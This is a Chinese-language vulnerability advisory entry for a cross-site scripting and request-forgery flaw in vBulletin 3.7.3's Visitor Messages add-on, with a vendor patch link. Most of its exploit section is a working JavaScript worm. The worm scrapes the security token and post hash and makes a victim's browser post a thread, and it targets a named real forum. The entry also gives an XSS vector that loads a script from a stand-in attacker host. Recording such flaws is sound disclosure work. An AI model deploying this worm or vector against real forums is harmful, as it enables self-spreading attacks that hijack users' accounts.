添加时间:
2008-12-09

系统编号:
WAVDB-01285
BUGTRAQ: 32387

影响版本:
VBulletin 3.7.3

程序介绍:

vBulletin是一个专业、便宜的社区论坛解决方案。数千客户，包括很多产业旗舰公司，选择了 vBulletin——它是所有中到大型网站社区的理想的选择。 使用它您的网站便可成为信息和讨论的中心，鼓励访问者一次次的回到您的网站。使用它也是一个改进您对客户/网站用户服务的一个高效的方式。我们的专一开发团队在保持关注安全与性能的同时，持续不断的使 vBulletin 走在互联网革新的最前沿。

漏洞分析:

vBulletin论坛所使用的visitor messages附加组件中存在输入验证错误。在张贴包含有跨站脚本的内容时，数据在显示给论坛公众之前要通过htmlentities();运行。但在张贴新消息的时候，会向被评论者发送新的通知。评论者可以张贴包含有跨站脚本内容的帖子，如

漏洞利用:

/* -----------------------------
 * Author      = Mx
 * Title       = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software    = vBulletin
 * Addon       = Visitor Messages
 * Version     = 3.7.3
 * Attack      = XSS/XSRF

 - Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
 + with the visitor messages addon (a clone of a social network wall/comment area).
 - When posting XSS, the data is run through htmlentities(); before being displayed
 + to the general public/forum members. However, when posting a new message,
 - a new notification is sent to the commentee. The commenter posts a XSS vector such as
 + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
 - under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
 + and I have included an example worm that makes the user post a new thread with your own
 - specified subject and message.

 * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
 * of the attack method.
 * ----------------------------- */

function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}

function getAXAH(url){

var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);

function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);

var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);

var subject = 'subject text';
var message = 'message text';

postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');

}
}
}
}








function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();
               
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);

function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

}
}
}
}


getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');

解决方案:
厂商补丁：
VBulletin
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://members.vbulletin.com/patches.php


信息来源:
<*来源：Mx
链接：http://secunia.com/advisories/32782/
http://www.vbulletin.com/forum/showthread.php?t=291665
*>